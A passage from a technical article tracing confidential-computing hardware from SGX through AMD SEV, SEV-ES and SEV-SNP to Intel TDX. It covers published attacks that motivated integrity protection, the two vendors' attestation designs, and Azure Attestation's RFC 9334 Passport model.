&lt;p&gt;The EPC cap was the first. A working set of ~96 MiB is fine for a key-wrapping service or a small ML model, but it is not a cloud-database VM. The second was the partitioned programming model. Real applications had to be split into trusted and untrusted halves with explicit &lt;code&gt;ECALL&lt;/code&gt; / &lt;code&gt;OCALL&lt;/code&gt; boundaries, which is a refactoring tax that few existing codebases would pay. The third was the side-channel question: Foreshadow [@foreshadow], SgxPectre [@sgxpectre], and SGAxe [@sgaxe] each demonstrated that a determined attacker with microarchitectural access could extract secrets from SGX, often without ever defeating the cipher itself.Microsoft&apos;s response was &lt;em&gt;Haven&lt;/em&gt;, an OSDI 2014 project that put a Windows library OS (Drawbridge) inside an SGX enclave to run unmodified Windows binaries. Haven worked as a proof of concept but was effectively obviated by the EPC cap and by the slow pace of SGX silicon delivery in Xeon-class CPUs. The library-OS-in-an-enclave became one of several dead ends on the road to whole-VM TEEs.&lt;/p&gt;
&lt;p&gt;Microsoft staked Azure publicly to &quot;data in use&quot; on September 14, 2017, when Mark Russinovich announced Azure confidential computing on the company blog: &quot;Microsoft Azure is the first cloud to offer new data security capabilities with a collection of features and services called Azure confidential computing&quot; [@russinovich-azure-2017]. The same post named the initial backing TEEs. &quot;Initially we support two TEEs, Virtual Secure Mode and Intel SGX. Virtual Secure Mode (VSM) is a software-based TEE that&apos;s implemented by Hyper-V in Windows 10 and Windows Server 2016&quot; [@russinovich-azure-2017]. VSM was already the substrate of Credential Guard and HVCI inside the operating system; pulling it up as a &quot;TEE the cloud customer can target&quot; was the bridge between the in-OS Secure Kernel story and the eventually-needed silicon-rooted CVM.&lt;/p&gt;
&lt;p&gt;The industry got organised two years later. The Confidential Computing Consortium formed under the Linux Foundation on October 17, 2019. The press release names the founding premiere members verbatim: &quot;Alibaba, Arm, Google Cloud, Huawei, Intel, Microsoft and Red Hat&quot; and the general members &quot;Baidu, ByteDance, decentriq, Fortanix, Kindite, Oasis Labs, Swisscom, Tencent and VMware&quot; [@lf-ccc-press]. An earlier Microsoft Open Source blog post on August 21, 2019, announced the formation with a slightly different membership list (including IBM but not Huawei) [@ms-ccc-blog]; the October press release is the formal founding roster.&lt;/p&gt;

Across three load-bearing AMD whitepapers -- SME/SEV (2016), SEV-ES (February 17, 2017), and SEV-SNP (January 9, 2020) -- the PDF cover-page metadata records &quot;David Kaplan&quot; as the named author [@amd-mem-enc-whitepaper; @amd-sev-es-whitepaper; @amd-snp-whitepaper], and the USENIX Security 2016 biography corroborates &quot;lead architect for the AMD memory encryption features&quot; [@usenix-kaplan-2016]. Across the parallel Intel artefacts -- the September 2020 TDX whitepaper and the Architecture Specification doc 344425-001 -- PDF metadata names only &quot;Intel Corporation&quot; as the institutional author and does not enumerate individual architects [@intel-tdx-spec-344425]. We name David Kaplan throughout because the documentary record names him; we deliberately do not name individual Intel architects because the documentary record does not.

flowchart TD
    Data[&quot;Customer data&quot;] --&amp;gt; Rest[&quot;At rest -- BitLocker, SED, KMS&quot;]
    Data --&amp;gt; Transit[&quot;In transit -- TLS 1.3, IPsec&quot;]
    Data --&amp;gt; Use[&quot;In use -- ?&quot;]
    Use --&amp;gt; CVM[&quot;Confidential VMs -- SEV-SNP / Intel TDX&quot;]
    CVM --&amp;gt; Para[&quot;Paravisor -- OpenHCL&quot;]
    Para --&amp;gt; MAA[&quot;MAA verifier&quot;]
&lt;p&gt;If a TEE has to be smaller than a single page cache, the unit of confidential computation is wrong. What if the unit were a whole VM, and the cipher engine lived inline with the memory controller? The next section is the first time someone tried.&lt;/p&gt;
&lt;h2&gt;3. Generation 1 and 1.5: confidentiality without integrity&lt;/h2&gt;
&lt;p&gt;April 2016. David Kaplan, Jeremy Powell, and Tom Woller publish the AMD whitepaper &lt;em&gt;AMD Memory Encryption&lt;/em&gt; [@amd-mem-enc-whitepaper]. The paper introduces two features in a single document. Secure Memory Encryption (SME) is a chassis-wide bulk cipher: a per-boot AES-128 key, managed by the on-die AMD Secure Processor, encrypts main memory transparently to the operating system. Secure Encrypted Virtualization (SEV) takes the same engine and gives each VM its own AES key tagged into an Address Space Identifier (ASID) in the cache, so two co-resident VMs cannot read each other&apos;s memory and neither can the hypervisor. The &quot;C-bit&quot; in the guest page table marks which pages are encrypted [@amd-mem-enc-whitepaper]. The first silicon to ship SEV was the first-generation EPYC &quot;Naples&quot; launched June 20, 2017 [@wiki-epyc].&lt;/p&gt;

A high physical-address bit in an AMD SEV guest&apos;s page-table entries that signals to the memory controller &quot;this page is encrypted with my VM&apos;s key.&quot; The C-bit is the per-page opt-in that lets a SEV guest mix encrypted private memory with explicitly shared bounce buffers in the same address space. Its absence means a page is cleartext to the hypervisor; its presence means the AES engine in the memory controller decrypts on every read and encrypts on every write [@amd-mem-enc-whitepaper].
&lt;p&gt;The threat model was clear and the architecture was honest about it. The hypervisor sees ciphertext on every encrypted page. What the architecture did &lt;em&gt;not&lt;/em&gt; do, and what the original whitepaper did &lt;em&gt;not&lt;/em&gt; claim, was integrity. The hypervisor remained authoritative over the nested page tables -- it could remap which host physical page a given guest physical address pointed to, and the cipher engine would happily decrypt whatever blob it found under the same key.&lt;/p&gt;
&lt;p&gt;That gap produced the architectural lesson.&lt;/p&gt;
&lt;h3&gt;SEVered (Morbitzer et al., EuroSec 2018)&lt;/h3&gt;
&lt;p&gt;In May 2018, four authors from Fraunhofer AISEC -- Mathias Morbitzer, Manuel Huber, Julian Horsch, and Sascha Wessel -- published a paper whose abstract is unambiguous: &quot;We present the design and implementation of SEVered, an attack from a malicious hypervisor capable of extracting the full contents of main memory in plaintext from SEV-encrypted virtual machines&quot; [@severed-arxiv]. The attack did not break the cipher. It exploited the fact that a malicious hypervisor could &lt;em&gt;remap&lt;/em&gt; the guest-physical pages backing a network service&apos;s response so that they pointed at the memory holding the secret it wanted. Because SEV transparently decrypts memory for the guest, the service would then read the target page as plaintext and transmit it over its normal output channel. Because there was no architectural binding between a guest physical address and the ciphertext that should sit there, the hypervisor could read the entire VM by chaining such remappings.&lt;/p&gt;

We present the design and implementation of SEVered, an attack from a malicious hypervisor capable of extracting the full contents of main memory in plaintext from SEV-encrypted virtual machines. -- Morbitzer, Huber, Horsch, Wessel, EuroSec&apos;18 [@severed-arxiv]
&lt;p&gt;The architectural lesson, stated as bluntly as the paper deserves, is that confidentiality without integrity is not confidentiality.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Confidentiality without integrity is not confidentiality. The hypervisor that can move ciphertext between addresses is the hypervisor that can read it. The integrity of the guest-physical-to-host-physical mapping is as load-bearing as the cipher itself.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;SEV-ES (February 2017): half a fix&lt;/h3&gt;
&lt;p&gt;AMD&apos;s first response was SEV-ES, dated February 17, 2017 in the whitepaper&apos;s PDF cover page [@amd-sev-es-whitepaper]. SEV-ES introduced register-state encryption on VMEXIT. Before SEV-ES, every VM exit handed the hypervisor a complete dump of guest CPU registers, including pointers into otherwise-encrypted memory. SEV-ES encrypted the saved register state under the guest key, surfaced a new &lt;code&gt;#VC&lt;/code&gt; (VMM Communication) exception (vector 29), and required the guest to use a deliberately shared page called the Guest-Hypervisor Communication Block (GHCB) for everything that genuinely needed to cross the boundary -- emulated I/O, MMIO, time, the works.&lt;/p&gt;

A page that a SEV-ES (and later SEV-SNP) guest deliberately shares with the hypervisor for the purposes of communicating about events the hypervisor genuinely needs to handle: emulated I/O, MMIO accesses, certain control-plane operations. The GHCB is the explicit, audited &quot;side channel&quot; through the trust boundary. Everything else stays encrypted [@amd-sev-es-whitepaper].
&lt;p&gt;SEV-ES closed one channel and left the other open. The integrity of the GPA-to-HPA mapping was still the hypervisor&apos;s problem to behave on, and the cipher was still XEX-mode AES without any keyed authentication. Two more papers made the architectural pressure unbearable.&lt;/p&gt;
&lt;h3&gt;ICUP (Buhren et al., CCS 2019) and SEVurity (Wilke et al., S&amp;amp;P 2020)&lt;/h3&gt;
&lt;p&gt;In August 2019, Robert Buhren, Christian Werling, and Jean-Pierre Seifert published &lt;em&gt;Insecure Until Proven Updated&lt;/em&gt; [@icup-arxiv]. The abstract makes the operational point cleanly: &quot;We demonstrate that it is possible to extract critical CPU-specific keys that are fundamental for the security of the remote attestation protocol. This effectively renders the SEV technology on current AMD Epyc CPUs useless when confronted with an untrusted cloud provider&quot; [@icup-arxiv]. The mechanism was a firmware rollback against the AMD-SP that exposed attestation keys.&lt;/p&gt;
&lt;p&gt;In May 2020, Wilke, Wichelmann, Morbitzer, and Eisenbarth published &lt;em&gt;SEVurity: No Security Without Integrity&lt;/em&gt; at IEEE S&amp;amp;P [@sevurity-uzl]. Their two new methods, the project-page abstract records verbatim, &quot;allow us to inject arbitrary code into SEV-ES secured virtual machines. Due to the lack of proper integrity protection, it is sufficient to reuse existing ciphertext to build a high-speed encryption oracle&quot; [@sevurity-uzl]. The architectural diagnosis was now overdetermined: integrity had to enter the design, not as a side feature, but as a load-bearing rail.The same Buhren-led group escalated to physical fault injection in August 2021 with &lt;em&gt;One Glitch to Rule Them All&lt;/em&gt;, voltage-glitching the AMD Secure Processor on Zen 1 / 2 / 3 to extract custom payloads [@one-glitch-arxiv]. The PSPReverse GitHub artefact contains the supporting tooling [@pspreverse-github]. This is the &lt;em&gt;physical-fault&lt;/em&gt; lower bound on the AMD-SP: an adversary with the right glitcher can subvert the security processor itself. The SEV-SNP design assumes a logical adversary; physical-access adversaries remain a known residual that §8 will revisit.&lt;/p&gt;
&lt;h3&gt;Intel&apos;s parallel road: TME and MKTME&lt;/h3&gt;
&lt;p&gt;Intel&apos;s bottom-of-stack cipher engine ran on a parallel track. In December 2017, Intel published &lt;em&gt;Architecture Memory Encryption Technologies Specification&lt;/em&gt;, document 336907 rev 1.1 [@intel-mem-enc-spec-336907], introducing Total Memory Encryption (TME). The multi-key successor, MKTME (later TME-MK), surfaced publicly through a September 7, 2018 Linux-kernel RFC by Alison Schofield archived on LWN: &quot;Multi-Key Total Memory Encryption API (MKTME) ... allows multiple encryption domains, each having their own key. While the main use case for the feature is virtual machine isolation&quot; [@lwn-mktme]. TME-MK is the per-keyID memory cipher that the eventual Intel TDX architecture will mount its trust-domain model on top of.&lt;/p&gt;
&lt;p&gt;Three papers, two vendors, one architectural verdict: confidentiality without integrity is not confidentiality, and the architecture has to change. What did AMD and Intel actually build in response?&lt;/p&gt;

flowchart LR
    SME[&quot;SME (2016) -- Bulk memory cipher&quot;]
    SEV[&quot;SEV (Naples, 2017) -- Per-VM AES key&quot;]
    ES[&quot;SEV-ES (Feb 2017) -- + Register-state cipher&quot;]
    SNP[&quot;SEV-SNP (Jan 2020) -- + Integrity rail&quot;]
    SME --&amp;gt; SEV
    SEV -- &quot;SEVered -- (EuroSec 2018)&quot; --&amp;gt; ES
    ES -- &quot;ICUP (CCS 2019) -- SEVurity (S&amp;amp;P 2020)&quot; --&amp;gt; SNP
&lt;h2&gt;4. Generation 2: the integrity rail&lt;/h2&gt;
&lt;p&gt;January 9, 2020. AMD publishes the 20-page SEV-SNP whitepaper, sole-authored by David Kaplan, with the title &lt;em&gt;Strengthening VM Isolation with Integrity Protection and More&lt;/em&gt; [@amd-snp-whitepaper]. Eight months later, in September 2020, Intel publishes the first public TDX whitepaper (document 343961-002US, filename &lt;code&gt;tdx-whitepaper-final9-17.pdf&lt;/code&gt;, PDF creation date Thursday September 17, 2020) and the companion Architecture Specification doc 344425-001 dated September 1, 2020 [@intel-tdx-spec-344425]. Two vendors, two different architectural answers, one shared diagnosis: the hypervisor must be excluded from the GPA-to-HPA mapping, not just from the ciphertext.Wikipedia describes Intel TDX as &quot;proposed by Intel in May 2021&quot; [@wiki-tdx], but the PDF cover-page metadata extracted from both the TDX whitepaper and the Architecture Specification places the public release in September 2020. Where Wikipedia and the Intel-authored PDFs disagree, the PDFs are the primary record.&lt;/p&gt;
&lt;h3&gt;AMD SEV-SNP: four ingredients&lt;/h3&gt;
&lt;p&gt;SEV-SNP keeps the per-VM AES cipher from SEV and the register-state encryption from SEV-ES, and adds four new architectural ingredients that together close the integrity gap.&lt;/p&gt;
&lt;p&gt;The first is the &lt;em&gt;Reverse Map Table&lt;/em&gt; (RMP). The RMP is a system-wide per-page metadata table consulted on every nested page-table walk. Each entry binds a host physical page to the tuple &lt;code&gt;(assigned ASID, expected guest physical address, VMPL, immutable bit, validated bit)&lt;/code&gt;. If the hypervisor tries to remap a guest physical address to a different host page, the RMP entry will fail to match and the CPU raises an &lt;code&gt;#NPF(rmpfault)&lt;/code&gt;. The architecture&apos;s own description is verbatim: &quot;SEV-SNP adds strong memory integrity protection to help prevent malicious hypervisor-based attacks like data replay, memory re-mapping, and more to create an isolated execution environment&quot; [@amd-sev-portal]. This is the integrity rail. It is not a separate keyed MAC over memory; it is a structural binding that turns SEVered-class remappings into faults.&lt;/p&gt;

A system-wide AMD SEV-SNP data structure that records, for every host physical page, the guest ASID it belongs to, the guest physical address it is mapped at, the VMPL ACL, an immutable flag, and a validated flag. Every nested page-table walk consults the RMP; mismatches raise `#NPF(rmpfault)`. The RMP is the architectural answer to SEVered: the hypervisor remains in charge of nested page tables, but the RMP says what each host page is allowed to be used for [@amd-snp-whitepaper; @amd-sev-portal].
&lt;p&gt;The second is the &lt;code&gt;PVALIDATE&lt;/code&gt; instruction. A SEV-SNP guest must explicitly &lt;em&gt;validate&lt;/em&gt; a page before it uses it for confidential storage. The hypervisor cannot fake validation; if the page has not been validated by the guest, accesses fault. This pushes the responsibility for tracking &quot;is this page really part of my private memory&quot; into the guest, where the hypervisor cannot lie about it.&lt;/p&gt;
&lt;p&gt;The third is the Virtual Machine Privilege Level lattice.&lt;/p&gt;

A four-level privilege lattice (VMPL0 highest, VMPL3 lowest) introduced by AMD SEV-SNP. Each RMP entry includes per-VMPL access-control bits, so a single SEV-SNP guest can split itself into multiple ring-shaped partitions where a higher-VMPL component (for example, a paravisor at VMPL0) sees pages that a lower-VMPL component (the customer&apos;s kernel at VMPL2) cannot. VMPL appears as a field inside the SNP_REPORT, so a remote verifier can tell which VMPL produced a given quote [@amd-snp-whitepaper].
&lt;p&gt;The fourth is the attestation report. The SNP_REPORT is an ECDSA-P384 signed blob produced by the AMD-SP, carrying fields including the launch &lt;em&gt;measurement&lt;/em&gt;, the guest &lt;em&gt;policy&lt;/em&gt;, the user-supplied &lt;em&gt;report_data&lt;/em&gt; nonce, the issuing &lt;em&gt;vmpl&lt;/em&gt;, the &lt;em&gt;chip_id&lt;/em&gt; (zeroed when the guest sets the MASK_CHIP_ID policy bit), and the &lt;em&gt;tcb_version&lt;/em&gt;. The signing key is the Versioned Chip Endorsement Key (VCEK), derived per chip per TCB version from a long-lived endorsement key, and the certificate chain runs &lt;code&gt;VCEK_cert -&amp;gt; ASK -&amp;gt; AMD root&lt;/code&gt; [@amd-sev-portal].&lt;/p&gt;

The AMD SEV-SNP attestation signing key. Derived deterministically from each chip&apos;s individual endorsement secret and the current TCB version (firmware level), so a single chip exposes one VCEK per TCB version. The certificate chain anchors back to AMD&apos;s root via the AMD Signing Key (ASK). The VCEK is what makes SEV-SNP attestation chain to silicon: the verifier checks the SNP_REPORT signature against a VCEK certificate AMD will only issue for genuine AMD-SP firmware [@amd-snp-whitepaper; @amd-sev-portal].

SEV-SNP adds strong memory integrity protection to help prevent malicious hypervisor-based attacks like data replay, memory re-mapping, and more in order to create an isolated execution environment. -- AMD SEV-SNP whitepaper, January 2020 [@amd-snp-whitepaper]

sequenceDiagram
    autonumber
    participant Guest as Guest CPU access
    participant NPT as Nested Page Walker
    participant RMP as Reverse Map Table
    participant AES as AES engine (memory ctrl)
    Guest-&amp;gt;&amp;gt;NPT: Resolve GVA -&amp;gt; GPA -&amp;gt; HPA
    NPT-&amp;gt;&amp;gt;RMP: Lookup (HPA)
    RMP--&amp;gt;&amp;gt;NPT: ASID, expected GPA, VMPL
    alt RMP entry matches request
        NPT-&amp;gt;&amp;gt;AES: Decrypt under VM key
        AES--&amp;gt;&amp;gt;Guest: Plaintext
    else Mismatch (SEVered-style remap)
        RMP--&amp;gt;&amp;gt;Guest: #NPF (rmpfault)
    end
&lt;h3&gt;Intel TDX: a different geometry, the same end-state&lt;/h3&gt;
&lt;p&gt;Intel reached the same architectural conclusion with a different mechanism. Rather than bake integrity into microcode plus the AMD-SP, Intel introduced a new CPU mode and a separately signed software module that runs in it. The Intel TDX overview is verbatim: &quot;A CPU-measured Intel TDX module enables Intel TDX. This software module runs in a new CPU Secure Arbitration Mode (SEAM) as a peer virtual machine manager (VMM) ... hosted in a reserved memory space identified by the SEAM Range Register (SEAMRR)&quot; [@intel-tdx-overview].&lt;/p&gt;
&lt;p&gt;The ingredients are seven, not four.&lt;/p&gt;

A new CPU privilege state introduced by Intel TDX. Code running in SEAM is hosted in a physical-memory range identified by the SEAM Range Register (SEAMRR) that the legacy VMM cannot inspect. Only the signed Intel TDX Module runs in SEAM, and it does so as a peer VMM that mediates every interaction between the legacy hypervisor and a Trust Domain [@intel-tdx-overview].
&lt;p&gt;The Intel &lt;strong&gt;TDX Module&lt;/strong&gt; is the second ingredient: a CPU-measured firmware binary, loaded by the SEAMLDR at boot, that mediates every entry into and exit from a Trust Domain via &lt;code&gt;SEAMCALL&lt;/code&gt; and &lt;code&gt;SEAMRET&lt;/code&gt; instructions. The Intel-signed &lt;code&gt;intel-tdx-module-1.5-base-spec-348549002.pdf&lt;/code&gt; is the canonical specification for the current generation [@intel-tdx-module-base-348549].&lt;/p&gt;
&lt;p&gt;The third is the &lt;strong&gt;Trust Domain&lt;/strong&gt;, a VM-shaped container that carries a &lt;em&gt;Shared Bit&lt;/em&gt; in the guest physical address. A clear shared bit means the page is private; a set shared bit means the page is deliberately shared with the hypervisor for I/O bounce buffers. The fourth is &lt;strong&gt;TME-MK&lt;/strong&gt; memory encryption, derived from the December 2017 TME spec [@intel-mem-enc-spec-336907] and the September 2018 MKTME Linux-kernel RFC [@lwn-mktme]: AES-128 in XTS mode, with the keyID embedded in the upper physical-address bits, gives one key per Trust Domain.&lt;/p&gt;
&lt;p&gt;The fifth ingredient is the structural analogue of AMD&apos;s RMP, the &lt;strong&gt;Physical-Address-Metadata table&lt;/strong&gt; (PAMT). The Intel TDX overview enumerates the architectural elements precisely: &quot;Intel TDX uses architectural elements such as SEAM, a shared bit in Guest Physical Address (GPA), secure Extended Page Table (EPT), physical-address-metadata table, Intel Total Memory Encryption -- Multi-Key (Intel TME-MK), and remote attestation&quot; [@intel-tdx-overview].&lt;/p&gt;
&lt;p&gt;The sixth ingredient is the measurement registers. The &lt;strong&gt;MRTD&lt;/strong&gt; is the build-time measurement of the initial TD image, similar to a TPM PCR fixed at launch. &lt;strong&gt;RTMR0 through RTMR3&lt;/strong&gt; are the runtime measurement registers, four PCR-equivalents the TDX Module exposes for runtime measured-boot extensions. These four registers are what a TDX-aware Trusted Boot chain extends.&lt;/p&gt;

The build-time and runtime measurement registers exposed by an Intel TDX Trust Domain. MRTD is hashed by the TDX Module over the initial TD launch image and is the SEAM analogue of an immutable launch PCR. RTMR0-3 are four extendable runtime registers, the SEAM analogue of the runtime-extension TPM PCRs (the same conceptual role as PCRs 8-15 in the canonical static-OS measurement chain), that hold a measured-boot chain of subsequent components (loaders, kernel, initrd, paravisor pages). The canonical TDX-vTPM event-log convention used by Linux IMA and systemd-stub maps RTMR[0] to PCR[1, 7]; RTMR[1] to PCR[2-6]; RTMR[2] to PCR[8-9]; and RTMR[3] to PCR[14, 17-22]. A TD Quote carries all five values; a verifier evaluates them against a customer-defined policy [@intel-tdx-overview; @intel-tdx-spec-344425].
&lt;p&gt;The seventh is the &lt;strong&gt;TD Quote&lt;/strong&gt;. A TD Quote is produced in two stages. The TD guest first issues &lt;code&gt;TDCALL[TDG.MR.REPORT]&lt;/code&gt;, which lands in the TDX Module (the VMM-to-Module entry is the separate &lt;code&gt;SEAMCALL&lt;/code&gt; interface defined in the comparison table below); the TDX Module returns an in-SEAM &lt;code&gt;SEAMREPORT&lt;/code&gt; structure, a Report MAC-signed with a key bound to the platform. A host-side SGX Quoting Enclave then converts that Report into a Quote signed with the SGX-resident QE attestation key. The Quote carries MRTD, RTMR0-3, the TD&apos;s TCB SVN (a per-component firmware version vector), and a caller nonce. The Intel Trust Authority (or Microsoft Azure Attestation, or Google&apos;s verifier) checks the quote [@intel-tdx-overview; @intel-tdx-module-base-348549].&lt;/p&gt;

flowchart TB
    HW[&quot;Silicon: TME-MK + SEAMRR -- + Secure EPT + PAMT&quot;]
    SEAM[&quot;Intel TDX Module -- (SEAM mode)&quot;]
    VMM[&quot;Legacy VMM -- (Hyper-V / KVM)&quot;]
    TD1[&quot;Trust Domain 1&quot;]
    TD2[&quot;Trust Domain 2&quot;]
    HW --&amp;gt; SEAM
    HW --&amp;gt; VMM
    VMM -- &quot;SEAMCALL&quot; --&amp;gt; SEAM
    SEAM -- &quot;SEAMRET&quot; --&amp;gt; VMM
    SEAM -- &quot;TDH.VP.ENTER&quot; --&amp;gt; TD1
    SEAM -- &quot;TDH.VP.ENTER&quot; --&amp;gt; TD2
&lt;h3&gt;Side by side&lt;/h3&gt;
&lt;p&gt;The two architectures answer the same question and arrive at the same end-state contract through fundamentally different trust geometries.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Ingredient&lt;/th&gt;
&lt;th&gt;AMD SEV-SNP&lt;/th&gt;
&lt;th&gt;Intel TDX&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Memory cipher&lt;/td&gt;
&lt;td&gt;AES-128, per-VM key in memory controller&lt;/td&gt;
&lt;td&gt;AES-128-XTS, per-TD key by keyID (TME-MK)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Integrity binding&lt;/td&gt;
&lt;td&gt;Reverse Map Table per host page&lt;/td&gt;
&lt;td&gt;Physical-Address-Metadata table + Secure EPT&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mediating component&lt;/td&gt;
&lt;td&gt;AMD-SP firmware (microcode + on-die security processor)&lt;/td&gt;
&lt;td&gt;Signed Intel TDX Module in SEAM mode&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Privilege lattice&lt;/td&gt;
&lt;td&gt;VMPL0-VMPL3 (four levels)&lt;/td&gt;
&lt;td&gt;TD Partitioning L1/L2 (TDX Module 1.5)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Build-time measurement&lt;/td&gt;
&lt;td&gt;Launch measurement in SNP_REPORT&lt;/td&gt;
&lt;td&gt;MRTD inside the TDX Module&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Runtime measurement&lt;/td&gt;
&lt;td&gt;None at module level (vTPM provides it)&lt;/td&gt;
&lt;td&gt;RTMR0-RTMR3 inside the TDX Module&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Attestation signing key&lt;/td&gt;
&lt;td&gt;VCEK (ECDSA-P384), per chip per TCB version&lt;/td&gt;
&lt;td&gt;SGX-resident Quoting Enclave key&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Certificate chain&lt;/td&gt;
&lt;td&gt;VCEK -&amp;gt; ASK -&amp;gt; AMD root&lt;/td&gt;
&lt;td&gt;Quoting Enclave -&amp;gt; Intel root&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Page-validation primitive&lt;/td&gt;
&lt;td&gt;&lt;code&gt;PVALIDATE&lt;/code&gt; (guest-driven)&lt;/td&gt;
&lt;td&gt;TDX Module-mediated page acceptance&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Shared-page indicator&lt;/td&gt;
&lt;td&gt;C-bit (clear = shared, set = encrypted)&lt;/td&gt;
&lt;td&gt;Shared bit in GPA (set = shared)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hypervisor-to-trust-component call&lt;/td&gt;
&lt;td&gt;Mediated VMRUN&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SEAMCALL&lt;/code&gt; / &lt;code&gt;SEAMRET&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;{`
// Pseudo-code sketch of how a SEV-SNP guest assembles an SNP_REPORT
// via SNP_GUEST_REQUEST. Not runnable against silicon; the point is
// the shape of the evidence the verifier receives.&lt;/p&gt;
&lt;p&gt;function buildSnpReport(nonce32) {
  // Guest builds a request structure with a 32-byte user nonce.
  const request = { reportData: nonce32, vmpl: 0 };&lt;/p&gt;
&lt;p&gt;  // Hypercall lands in the AMD-SP, which signs with the VCEK.
  const report = sp_guest_request(request);&lt;/p&gt;
&lt;p&gt;  return {
    version:        report.version,        // structure version
    guestSvn:       report.guestSvn,       // guest firmware SVN
    policy:         report.policy,         // SEV policy bits at launch
    familyId:       report.familyId,       // 16-byte ID set by launch
    measurement:    report.measurement,    // 48-byte launch measurement
    reportData:     report.reportData,     // echoes user nonce
    vmpl:           report.vmpl,           // VMPL of issuing component
    chipId:         report.chipId,         // 64-byte unique chip ID
    tcbVersion:     report.tcbVersion,     // boot loader / TEE / SNP / microcode SVNs
    signature:      report.signature,      // ECDSA P-384 over the report
  };
}&lt;/p&gt;
&lt;p&gt;// The verifier walks the certificate chain VCEK -&amp;gt; ASK -&amp;gt; AMD root,
// re-checks the signature, and then evaluates policy on the claims.
console.log(JSON.stringify(buildSnpReport(&apos;nonce_from_relying_party&apos;), null, 2));
`}&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; SEV-SNP and TDX answer the same question differently. AMD bakes integrity into microcode plus the AMD-SP, signs with a per-chip per-TCB VCEK, and exposes a four-level VMPL lattice. Intel puts integrity into a separately loaded, separately signed software module running in a new CPU mode, signs with an SGX-resident Quoting Enclave, and exposes L1/L2 partitioning. The trust roots, the breaking surfaces, and the supply chains are different even when the end-state contract is the same.&lt;/p&gt;
&lt;/blockquote&gt;

flowchart LR
    subgraph AMD[&quot;AMD SEV-SNP&quot;]
        A1[&quot;AMD-SP firmware&quot;]
        A2[&quot;Reverse Map Table&quot;]
        A3[&quot;VMPL0-3 lattice&quot;]
        A4[&quot;SNP_REPORT -- VCEK signed&quot;]
    end
    subgraph INTEL[&quot;Intel TDX&quot;]
        I1[&quot;Signed TDX Module&quot;]
        I2[&quot;PAMT + Secure EPT&quot;]
        I3[&quot;L1 / L2 partitioning&quot;]
        I4[&quot;TD Quote -- Quoting Enclave&quot;]
    end
    A1 --- I1
    A2 --- I2
    A3 --- I3
    A4 --- I4
&lt;p&gt;Generation 2 makes a confidential VM architecturally possible. But a SEV-SNP guest is not yet a Windows Server VM you can lift and shift onto Azure -- there is a whole productisation problem still to solve. How does Microsoft put a paravisor inside that trust boundary, and what does it deliver?&lt;/p&gt;
&lt;h2&gt;5. The contract: a cloud-shaped TEE&lt;/h2&gt;
&lt;p&gt;A confidential VM is two rails, not one. Rail 1 is &lt;strong&gt;confidentiality plus integrity&lt;/strong&gt; of memory and CPU state. Rail 2 is &lt;strong&gt;measurement plus attestation&lt;/strong&gt;. SEV-SNP and TDX each deliver both rails. Anyone who has read the equivalent Secure Boot / Trusted Boot story will recognise the shape: a measurement chain anchored in silicon, terminated in a remote verifier, with a signed result that a relying party can act on.&lt;/p&gt;
&lt;p&gt;The Confidential Computing Consortium&apos;s framing, repeated here as a contract the architectures actually realise: &quot;Confidential Computing protects data in use by performing computation in a hardware-based, attested Trusted Execution Environment&quot; [@ccc-about]. &lt;em&gt;Hardware-based&lt;/em&gt; is rail 1. &lt;em&gt;Attested&lt;/em&gt; is rail 2. The two words together are why a TPM-only system, however well-measured, is not a CVM, and why a SEV-only system, however well-encrypted, is not a CVM either.&lt;/p&gt;
&lt;p&gt;RFC 9334 names the actors. The &lt;em&gt;attester&lt;/em&gt; is the guest plus the paravisor producing evidence. The &lt;em&gt;evidence&lt;/em&gt; is the SNP_REPORT or TD Quote, plus optionally a vTPM quote chained to it. The &lt;em&gt;verifier&lt;/em&gt; is the entity that checks the evidence against a policy and emits an attestation result. The &lt;em&gt;relying party&lt;/em&gt; is the consumer who acts on the result -- typically a key vault releasing a wrapped secret [@rfc9334].&lt;/p&gt;

The IETF Remote ATtestation procedureS working group&apos;s RFC 9334 (January 2023) fixes the vocabulary the rest of the confidential-computing industry uses: an *attester* produces *evidence*; a *verifier* checks it against reference values from an *endorser* and a *reference value provider* and emits an *attestation result*; a *relying party* acts on the result. RFC 9334 §5 names two topologies. In the *Passport* model (§5.1), the attester sends evidence directly to the verifier, collects a signed result, and presents that result to the relying party. In the *Background-Check* model (§5.2), the attester sends evidence to the relying party, which forwards it to the verifier and receives the result on the attester&apos;s behalf. Microsoft Azure Attestation, Intel Trust Authority, Google&apos;s verifier, and AWS KMS attestation all implement variants of this model [@rfc9334].
&lt;p&gt;Microsoft Azure Attestation implements the &lt;em&gt;Passport&lt;/em&gt; model. The attester -- the CVM, through its in-guest agent -- sends evidence (an SNP_REPORT or TD Quote, plus a vTPM quote) directly to MAA. MAA validates the evidence against the customer-authored policy and returns a signed JWT. The attester then presents that JWT to the relying party. Azure Key Vault authorises Secure Key Release against the MAA-issued claim set, not against raw SNP evidence. The relying party never sees the SNP_REPORT and never calls MAA on the attester&apos;s behalf, which is the design signature of Passport rather than Background-Check [@rfc9334; @msdocs-maa-overview].&lt;/p&gt;

flowchart LR
